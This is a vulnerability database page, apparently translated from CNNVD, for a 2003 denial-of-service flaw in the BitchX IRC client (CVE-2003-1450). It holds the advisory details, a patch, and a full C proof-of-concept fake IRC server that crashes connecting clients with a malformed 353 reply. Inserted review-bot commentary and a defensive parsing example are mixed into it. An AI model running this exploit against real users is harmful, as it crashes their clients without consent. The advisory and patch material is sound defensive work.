CVE-2003-1450
CVSS 5.0
Published: 2003-12-31 00:00:00
Revised: 2008-09-05 16:36:58

[Original] BitchX 75p3 and 1.0c16 through 1.0c20cvs allows remote attackers to cause a denial of service (segmentation fault) via a malformed RPL_NAMREPLY numeric 353 message.


[CNNVD] BitchX Malformed RPL_NAMREPLY Remote Denial of Service Vulnerability (CNNVD-200312-359)

        
        BitchX is a popular IRC client that runs on several operating systems, including Linux and Windows.
        BitchX does not correctly handle some replies carrying the RPL_NAMREPLY numeric: a remote attacker (any IRC server the client connects to, or anything able to pose as one) can exploit this to crash the client, a denial of service.
        Sending a malformed numeric 353 (RPL_NAMREPLY) reply that omits the channel or names-list parameter to a BitchX client crashes BitchX with a segmentation fault.
        

- CVSS (base score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: NONE [no impact on system confidentiality]
Integrity impact: NONE [no impact on system integrity]
Availability impact: PARTIAL [reduced performance or interrupted access to resources]
Attack complexity: LOW [no specialized access conditions are required to exploit]
Attack vector: NETWORK [no local or intranet access needed]
Authentication: NONE [no authentication required to exploit]

- CWE (weakness category)

CWE-20 [Improper Input Validation]

- CPE (affected platforms and products)

cpe:/a:bitchx:bitchx:1.0_c16
cpe:/a:bitchx:bitchx:75p3
cpe:/a:bitchx:bitchx:1.0_c19
cpe:/a:bitchx:bitchx:1.0_c20cvs

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1450
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-1450
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200312-359
(official data source) CNNVD

- Other links and resources

http://xforce.iss.net/xforce/xfdb/11363
(UNKNOWN)  XF  bitchx-irc-namreply-dos(11363)
http://www.securityfocus.com/bid/6880
(UNKNOWN)  BID  6880
http://www.securityfocus.com/archive/1/312133
(UNKNOWN)  BUGTRAQ  20030217 [argv] BitchX-353 Vulnerability
http://www.linuxsecurity.com/content/view/104622/104/
(UNKNOWN)  GENTOO  200302-11
http://lists.grok.org.uk/pipermail/full-disclosure/2003-February/003850.html
(UNKNOWN)  FULLDISC  20030217 [argv] BitchX-353 Vulnerability
http://securityreason.com/securityalert/3279
(UNKNOWN)  SREASON  3279

- Vulnerability information

BitchX Malformed RPL_NAMREPLY Remote Denial of Service Vulnerability
Medium severity, input validation
2003-12-31 00:00:00 2003-12-31 00:00:00
Remote

- Advisories and patches

        Workaround:
        If you cannot install the patch or upgrade immediately, CNNVD recommends the following to reduce the risk:
        * argv@hushmail.com has provided a third-party patch:
        - -----begin BitchX-1.0c20cvs-353.diff-----
        diff -Nru BitchX.orig/source/funny.c BitchX/source/funny.c
        - --- BitchX.orig/source/funny.c Sun Feb 16 18:34:16 2003
        +++ BitchX/source/funny.c Sun Feb 16 18:39:56 2003
        @@ -260,7 +260,10 @@
        type = Args[0];
        channel = Args[1];
        line = Args[2];
        - -
        + if (channel == NULL || line == NULL) {
        + bitchsay("Invalid number of arguments for ", __FUNCTION__);
        + return;
        + }
        ptr = line;
        while (*ptr)
        {
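Review bot: the diagnostic on the `+ bitchsay("Invalid number of arguments for ", __FUNCTION__);` line passes __FUNCTION__ as an extra argument but the format string has no `%s` to consume it, so if bitchsay() is printf-style (which the trailing argument suggests) the function name is silently dropped; make it `"Invalid number of arguments for %s"`. The guard itself, returning when `channel` or `line` is NULL before `ptr = line;` / `while (*ptr)`, is the right fix and matches the workaround in the PoC header, but `type = Args[0];` stays unchecked; if later code in this function dereferences `type`, add it to the same condition. Note also that the patch as posted is dash-escaped (PGP clearsign style: `- ---` for `---`, `- -` for the blank context line), so `patch` will reject it until the leading `- ` is stripped from those lines.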
        - -----end BitchX-1.0c20cvs-353.diff-----
        Vendor patch:
        BitchX
        ------
        The vendor has released an upgrade that fixes this issue; download it from the vendor's homepage.
        Gentoo Linux users of 'net-irc/bitchx' are advised to upgrade with:
        emerge sync
        emerge -u bitchx
        emerge clean

- Vulnerability information (22259)

BitchX 1.0 Malformed RPL_NAMREPLY Denial Of Service Vulnerability (EDBID:22259)
linux dos
2003-01-30 Verified
0 argv
N/A
source: http://www.securityfocus.com/bid/6880/info

It has been reported that BitchX does not properly handle some types of replies contained in the RPL_NAMREPLY numeric. When a malformed reply is received by the client, the client crashes, resulting in a denial of service. 

/*
 * bitchx-353.c
 * --argv
 * Jan/30/03
 *
 * Vulnerable:
 *      BitchX-75p3
 *      BitchX-1.0c16
 *      BitchX-1.0c19
 *      BitchX-1.0c20cvs
 *
 * Not Vulnerable:
 *      BitchX-1.0c18   (So far..)
 *
 *
 *  Workaround:
 *      in function funny_namreply()
 *      after the PasteArgs(Args, 2);
 *      add in
 *      -- snip --
 *      if (Args[1] == NULL || Args[2] == NULL)
 *                      return;
 *      -- unsnip --
 *
 * ---- the vuln code of bx -----
 *       PasteArgs(Args, 2);
 *       type = Args[0];
 *       channel = Args[1];
 *       line = Args[2];
 *
 *       ptr = line;
 *       while (*ptr)
 *       {
 *               while (*ptr && (*ptr != ' '))
 *                       ptr++;
 *               user_count++;
 *               while (*ptr && (*ptr == ' '))
 *                       ptr++;
 *       }
 * ------------------------------
 *
 * [panasync(panasync@colossus.melnibone.org)] you would hope the irc server would be a trusted source.
 * [hellman(hellman@ipv6.gi-1.au.reroute.se)] 'Free porn at /server irc.owned.com'
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>      /* memset, strlen (missing in the original) */
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>

/* A 353 (RPL_NAMREPLY) line with no channel / names-list parameters: the
 * client's funny_namreply() ends up with Args[2] == NULL and dereferences it. */
static char shellcode[] = ":* 353 * =  :\n";    // <-- this could be something worse.

int acceptConnection(int fd)
{
   char *ip_addr;
   int descriptor;
   struct sockaddr_in sa;
   socklen_t sal = sizeof(sa);          /* accept() wants socklen_t, not int */
   descriptor = accept(fd, (struct sockaddr *) &sa, &sal);
   if (descriptor >= 0) {
      ip_addr = inet_ntoa(sa.sin_addr);
      printf("Connection from %s:%d\n", ip_addr, ntohs(sa.sin_port));
   }
   return descriptor;
}


int main(int argc, char **argv)
{
   int sock, serv, port, one = 1;
   struct sockaddr_in server;

   port = 6667;                          /* default IRC port; override with argv[1] */

   if (argc > 1)
        port = atoi(argv[1]);

   memset(&server, 0, sizeof(server));
   server.sin_port = htons(port);
   server.sin_family = AF_INET;
   server.sin_addr.s_addr = INADDR_ANY;

   sock = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
   if (sock == -1) {
      perror("socket");
      return 1;
   }
   /* SO_REUSEADDR takes a pointer to an int set to 1; the original passed the
    * still-uninitialized 'serv'. */
   setsockopt(sock, SOL_SOCKET, SO_REUSEADDR, &one, sizeof(one));

   if (bind(sock, (struct sockaddr *) &server, sizeof(struct sockaddr_in))
       == -1) {
      perror("bind");
      return 1;
   }

   listen(sock, 1);

   /* Pose as an IRC server: every client that connects is sent the malformed
    * numeric and then disconnected. */
   while (1) {
      serv = acceptConnection(sock);
      if (serv < 0)
         continue;                       /* don't write() to -1 after a failed accept */
      write(serv, shellcode, strlen(shellcode));
      close(serv);
   }
   return 0;
}
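An added worked example, not part of the original page, of the BitchX sources, or of argv's exploit: a minimal RFC 1459 parameter splitter followed by a 353 handler written the way the patch and the PoC's workaround suggest, i.e. checking that the channel and names-list parameters exist before walking the names list with the counting loop quoted in the PoC header. The names irc_split and namreply_user_count, the parameter layout, and the two sample IRC lines are this example's own (the sample lines are constructed; the malformed one is the string the PoC sends); BitchX's own PasteArgs()/funny_namreply() are not reproduced.

```c
#include <stdio.h>
#include <string.h>

#define MAX_PARAMS 16

/* Split one IRC line (CRLF already stripped) into an optional ":prefix" and
 * its parameters, RFC 1459 style: space-separated "middle" parameters and an
 * optional ":"-introduced trailing parameter that runs to end of line and
 * may be empty.  Modifies buf in place; returns the parameter count. */
static int irc_split(char *buf, const char **prefix, const char **params, int max)
{
    int n = 0;
    char *p = buf;

    *prefix = NULL;
    if (*p == ':') {
        *prefix = ++p;
        while (*p && *p != ' ')
            p++;
        if (*p)
            *p++ = '\0';
    }
    while (*p && n < max) {
        while (*p == ' ')                 /* tolerate runs of spaces, as in the PoC line */
            p++;
        if (!*p)
            break;
        if (*p == ':') {                  /* trailing parameter: rest of line, possibly "" */
            params[n++] = p + 1;
            break;
        }
        params[n++] = p;
        while (*p && *p != ' ')
            p++;
        if (*p)
            *p++ = '\0';
    }
    return n;
}

/* Handle a 353 (RPL_NAMREPLY) line:
 *   :<server> 353 <me> <type> <channel> :<nick> <nick> ...
 * Once the numeric and target are consumed, <type>, <channel> and the names
 * list are what BitchX's funny_namreply() sees as Args[0], Args[1], Args[2].
 * Returns the nick count; -1 if the line is not a 353; -2 if <channel> or the
 * names list is absent (the shape that made BitchX dereference NULL); -3 if
 * the line exceeds the IRC maximum. */
int namreply_user_count(const char *msg)
{
    char buf[512];                        /* RFC 1459: a line is at most 512 octets */
    const char *prefix, *params[MAX_PARAMS], *ptr;
    int n, user_count = 0;

    if (strlen(msg) >= sizeof buf)
        return -3;
    strcpy(buf, msg);
    buf[strcspn(buf, "\r\n")] = '\0';

    n = irc_split(buf, &prefix, params, MAX_PARAMS);
    if (n < 1 || strcmp(params[0], "353") != 0)
        return -1;
    if (n < 5)                            /* the check the unpatched code lacked */
        return -2;

    /* Same counting loop as the vulnerable code, now reached only with a
     * non-NULL names list. */
    ptr = params[4];
    while (*ptr) {
        while (*ptr && *ptr != ' ')
            ptr++;
        user_count++;
        while (*ptr == ' ')
            ptr++;
    }
    return user_count;
}

int main(void)
{
    /* Constructed sample lines: a well-formed reply and the PoC's malformed one. */
    const char *good = ":irc.example.net 353 me = #chan :alice @bob +carol";
    const char *bad  = ":* 353 * =  :";

    printf("%s -> %d\n", good, namreply_user_count(good));   /* 3 */
    printf("%s -> %d\n", bad, namreply_user_count(bad));     /* -2 */
    return 0;
}
```

Fed the PoC's line `:* 353 * =  :`, the splitter yields only four parameters (the trailing one is the empty string, the names list is missing entirely), so the handler returns -2 instead of reaching `while (*ptr)` with a NULL pointer; the well-formed reply yields the nick count. The lesson generalises beyond 353: any numeric handler that indexes into the parameter array must check the count first, because the server is a network peer, not a trusted source.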
		

- Vulnerability information

60186
BitchX IRC Client RPL_NAMREPLY Message Remote DoS
Remote / Network Access Denial of Service
Loss of Availability
Exploit Public Uncoordinated Disclosure

- Vulnerability description

Unknown or Incomplete

- Timeline

2003-02-17 Unknown
Unknown Unknown

- Solution

Unknown or Incomplete

- References

- Vulnerability author

Unknown or Incomplete
 

 
